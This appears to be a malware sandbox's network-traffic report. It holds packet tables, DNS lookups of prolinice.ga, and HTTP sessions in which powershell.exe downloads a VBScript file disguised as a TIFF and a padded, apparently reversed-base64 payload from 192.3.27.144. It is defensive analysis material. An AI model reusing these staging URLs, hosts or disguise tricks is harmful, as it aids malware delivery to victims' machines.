                                                                                                                                                                                                            Jan 8, 2025 11:09:50.357841015 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.357867002 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.357877970 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.357918024 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358129978 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358155012 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358181000 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358232021 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358241081 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358278036 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358364105 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358372927 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358383894 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358397007 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358400106 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358419895 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358428001 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358433962 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358462095 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358618975 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358628988 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358668089 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358808041 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358818054 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358859062 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358861923 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358871937 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358942986 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358963966 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.358989954 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359002113 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359081984 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359091043 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359127998 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359297991 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359309912 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359327078 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359334946 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359370947 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359380960 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359390974 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359426022 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359581947 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359606028 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359647036 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359762907 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359775066 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359785080 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.359810114 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.380147934 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.380194902 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.380280018 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.380290985 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.380301952 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.380321026 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.477658033 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.481796980 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.481821060 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.481836081 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.481844902 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.481857061 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.481884003 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.481899023 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482172966 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482183933 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482194901 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482217073 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482235909 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482623100 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482633114 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482642889 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482654095 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482672930 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.482685089 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.603435040 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.603461981 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.603473902 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.603483915 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.603496075 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.603507042 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.603528023 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.603588104 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.608125925 CET4974480192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:50.612899065 CET804974446.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.433537960 CET4974680192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.438553095 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.438627005 CET4974680192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.438980103 CET4974680192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.439060926 CET4974680192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.443769932 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.443955898 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.443969011 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.443979979 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:53.443991899 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:54.445406914 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:54.445487976 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            Jan 8, 2025 11:09:54.445641041 CET4974680192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:54.476819038 CET4974680192.168.2.446.173.214.14
                                                                                                                                                                                                            Jan 8, 2025 11:09:54.481611013 CET804974646.173.214.14192.168.2.4
                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Jan 8, 2025 11:09:04.181592941 CET5175153192.168.2.41.1.1.1
                                                                                                                                                                                                            Jan 8, 2025 11:09:48.670789957 CET6070753192.168.2.41.1.1.1
                                                                                                                                                                                                            Jan 8, 2025 11:09:48.877963066 CET53607071.1.1.1192.168.2.4
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jan 8, 2025 11:09:04.181592941 CET192.168.2.41.1.1.10x36c1Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Jan 8, 2025 11:09:48.670789957 CET192.168.2.41.1.1.10xea21Standard query (0)prolinice.gaA (IP address)IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Jan 8, 2025 11:09:04.188597918 CET1.1.1.1192.168.2.40x36c1No error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Jan 8, 2025 11:09:48.877963066 CET1.1.1.1192.168.2.40xea21No error (0)prolinice.ga46.173.214.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                            • 192.3.27.144
                                                                                                                                                                                                            • prfkokybvrvkyi.org
                                                                                                                                                                                                              • prolinice.ga
                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.449733192.3.27.144807608C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.061459064 CET319OUTGET /250/sweetnessgoodforgreatnessthingswithgood.tIF HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                            Host: 192.3.27.144
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528511047 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 08 Jan 2025 10:08:59 GMT
                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                            Last-Modified: Tue, 07 Jan 2025 16:12:53 GMT
                                                                                                                                                                                                            ETag: "36dfb-62b200471edfb"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Content-Length: 224763
                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: image/tiff
                                                                                                                                                                                                            Data Raw: 44 69 6d 20 73 68 20 27 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 20 6f 62 6a 65 63 74 0d 0a 44 69 6d 20 66 73 6f 20 27 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 74 0d 0a 44 69 6d 20 66 6f 72 6d 61 74 20 27 53 74 72 69 6e 67 46 6f 72 6d 61 74 74 65 72 20 6f 62 6a 65 63 74 0d 0a 44 69 6d 20 73 75 69 74 65 46 6f 6c 64 65 72 20 27 73 74 72 69 6e 67 3a 20 66 6f 6c 64 65 72 20 77 68 65 72 65 20 74 65 73 74 20 73 75 69 74 65 20 73 63 72 69 70 74 73 20 61 72 65 20 6c 6f 63 61 74 65 64 0d 0a 44 69 6d 20 70 72 6f 6a 65 63 74 46 6f 6c 64 65 72 20 27 73 74 72 69 6e 67 3a 20 72 6f 6f 74 20 66 6f 6c 64 65 72 20 66 6f 72 20 74 68 69 73 20 70 72 6f 6a 65 63 74 0d 0a 44 69 6d 20 73 75 69 74 65 46 69 6c 74 65 72 20 27 73 74 72 69 6e 67 3a 20 66 69 6c 65 6e 61 6d 65 20 66 69 6c 74 65 72 20 66 6f 72 20 73 65 6c 65 63 74 69 6e 67 20 69 6e 74 65 67 72 61 74 69 6f 6e 20 74 65 73 74 20 73 75 69 74 65 73 2e 0d 0a 44 69 6d 20 63 61 70 74 69 6f 6e 20 27 73 74 72 69 6e 67 3a 20 4d 73 67 42 6f 78 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: Dim sh 'WScript.Shell objectDim fso 'Scripting.FileSystemObjectDim format 'StringFormatter objectDim suiteFolder 'string: folder where test suite scripts are locatedDim projectFolder 'string: root folder for this projectDim suiteFilter 'string: filename filter for selecting integration test suites.Dim caption 'string: MsgBox/PopUp title bar text.Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators.Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables.Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push.Dim nextItem 'integer: current index of the prepItems array.Dim settings 'integer: controls MsgBox/PopUp behaviour.Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout.Dim flagFile 'string: filename of a temp file used by Setup.vbs.Dim versionLink 'web pag
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528531075 CET1236INData Raw: 65 20 77 69 74 68 20 76 65 72 73 69 6f 6e 20 69 6e 66 6f 0d 0a 44 69 6d 20 65 64 69 74 6f 72 20 27 64 6f 63 75 6d 65 6e 74 20 65 64 69 74 6f 72 0d 0a 44 69 6d 20 70 6f 77 65 72 73 68 65 6c 6c 20 27 66 69 6c 65 73 70 65 63 20 6f 66 20 61 20 70 77
                                                                                                                                                                                                            Data Ascii: e with version infoDim editor 'document editorDim powershell 'filespec of a pwsh.exe, if available; or just "powershell"Const CreateNew = True 'for the OpenTextFile method.Const Enter = 13 'window.event.keyCode for the Enter keyConst
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528542995 CET1236INData Raw: 65 73 74 4c 61 75 6e 63 68 65 72 22 0d 0a 20 20 20 20 64 65 66 61 75 6c 74 44 6f 63 47 65 6e 73 20 3d 20 22 65 78 61 6d 70 6c 65 73 5c 47 65 6e 65 72 61 74 65 2d 74 68 65 2d 43 53 68 61 72 70 2d 64 6f 63 73 2e 76 62 73 20 7c 20 65 78 61 6d 70 6c
                                                                                                                                                                                                            Data Ascii: estLauncher" defaultDocGens = "examples\Generate-the-CSharp-docs.vbs | examples\Generate-the-VBScript-docs.vbs" defaultGits = "%ProgramFiles%\Git\cmd\git-gui.exe | %ProgramFiles%\Git\git-bash.exe | %LocalAppData%\Programs\Git\cmd\git
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528556108 CET672INData Raw: 20 20 20 49 66 20 2e 45 78 69 73 74 73 28 20 22 65 64 69 74 6f 72 22 20 29 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 64 69 74 6f 72 20 3d 20 2e 49 74 65 6d 28 20 22 65 64 69 74 6f 72 22 20 29 0d 0a 20 20 20 20 20 20 20 20 45 6c
                                                                                                                                                                                                            Data Ascii: If .Exists( "editor" ) Then editor = .Item( "editor" ) Else editor = defaultEditor End If End With prepItems = Array("" _ , "UpdatePrePushDocs" _ , "RunSetupUninstall" _
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528568983 CET1236INData Raw: 0d 0a 0d 0a 53 75 62 20 70 72 65 70 42 74 6e 5f 4f 6e 43 6c 69 63 6b 0d 0a 20 20 20 20 6e 65 78 74 49 74 65 6d 20 3d 20 30 0d 0a 20 20 20 20 41 77 61 69 74 4e 65 78 74 49 74 65 6d 0d 0a 45 6e 64 20 53 75 62 0d 0a 53 75 62 20 41 77 61 69 74 4e 65
                                                                                                                                                                                                            Data Ascii: Sub prepBtn_OnClick nextItem = 0 AwaitNextItemEnd SubSub AwaitNextItem ClearFeedback nextItem = nextItem + 1 If nextItem > UBound( prepItems ) Then nextItem = 0 Exit Sub End If windo
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528580904 CET1236INData Raw: 70 72 6f 6a 65 63 74 46 6f 6c 64 65 72 2c 20 64 6f 63 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 29 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 68 2e 52 75 6e 20 63 6d 64 2c 20 68 69 64 64 65 6e 0d 0a 20 20 20 20 20 20 20 20 45 6e 64 20
                                                                                                                                                                                                            Data Ascii: projectFolder, doc _ )) sh.Run cmd, hidden End If Next AwaitNextItemEnd SubSub RunSetupUninstall Dim response If Not uninstallChkBox.checked Then AwaitNextItem Exit
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528594017 CET1236INData Raw: 6c 73 65 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 20 70 72 65 70 49 74 65 6d 73 28 6e 65 78 74 49 74 65 6d 29 2c 20 31 2c 20 56 42 53 63 72 69 70 74 0d 0a 20 20 20 20 20 20 20 20 43 6c 65 61 72 46 65 65 64 62 61 63 6b 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: lse window.setTimeout prepItems(nextItem), 1, VBScript ClearFeedback End IfEnd SubFunction UninstallFromProgramsAndFeatures Dim key : key = format( Array( _ "%s\VBScripting\UninstallString", uninstallKey _
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528616905 CET1236INData Raw: 76 62 4c 66 20 26 20 76 62 4c 66 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 49 66 20 61 6e 79 20 70 72 6f 63 65 73 73 65 73 20 61 72 65 20 75 73 69 6e 67 20 74 68 65 20 70 72 6f 6a 65 63 74 20 6d 6f 64 75 6c 65 20 6f 72 20 6c 69 62
                                                                                                                                                                                                            Data Ascii: vbLf & vbLf & _ "If any processes are using the project module or library files, then the C# compiler will not be able to recreate those files.", _ settings, caption) Else response = vbYes End If If vbY
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528637886 CET328INData Raw: 65 6e 0d 0a 20 20 20 20 20 20 20 20 41 77 61 69 74 4e 65 78 74 49 74 65 6d 0d 0a 20 20 20 20 20 20 20 20 45 78 69 74 20 53 75 62 0d 0a 20 20 20 20 45 6e 64 20 49 66 0d 0a 20 20 20 20 46 65 65 64 62 61 63 6b 20 22 57 61 69 74 69 6e 67 20 66 6f 72
                                                                                                                                                                                                            Data Ascii: en AwaitNextItem Exit Sub End If Feedback "Waiting for tests to complete.<br><br>After each test suite finishes, and after inspecting for errors, close the console window(s)." path = format( Array( _ "
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.528651953 CET1236INData Raw: 68 20 29 2e 46 69 6c 65 73 0d 0a 20 20 20 20 20 20 20 20 49 66 20 62 69 74 43 61 6e 63 65 6c 20 41 6e 64 20 53 75 69 74 65 52 65 73 75 6c 74 28 20 66 69 6c 65 20 29 20 54 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 43 6c 65 61 72 46 65 65
                                                                                                                                                                                                            Data Ascii: h ).Files If bitCancel And SuiteResult( file ) Then ClearFeedback Exit Sub End If Next ClearFeedback AwaitNextItemEnd SubFunction SuiteResult( suiteCandidate ) Dim response 'i
                                                                                                                                                                                                            Jan 8, 2025 11:08:59.533556938 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 72 65 73 70 6f 6e 73 65 20 3d 20 4d 73 67 42 6f 78 28 66 6f 72 6d 61 74 28 41 72 72 61 79 28 22 52 75 6e 20 25 73 3f 22 2c 20 69 74 65 6d 29 29 2c 20 73 65 74 74 69 6e 67 73 2c 20 63 61 70 74 69 6f 6e 29 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: response = MsgBox(format(Array("Run %s?", item)), settings, caption) Else response = vbYes End If If vbYes = response Then sh.Run format(Array("""%s""", item)),, synchronous ElseIf vbC


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.449743192.3.27.144807948C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.401454926 CET83OUTGET /250/evenmegoodfor.txt HTTP/1.1
                                                                                                                                                                                                            Host: 192.3.27.144
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874324083 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 08 Jan 2025 10:09:23 GMT
                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                            Last-Modified: Tue, 07 Jan 2025 16:11:41 GMT
                                                                                                                                                                                                            ETag: "c558-62b2000228871"
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Content-Length: 50520
                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                            Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874382019 CET224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874409914 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                            Jan 8, 2025 11:09:23.874425888 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
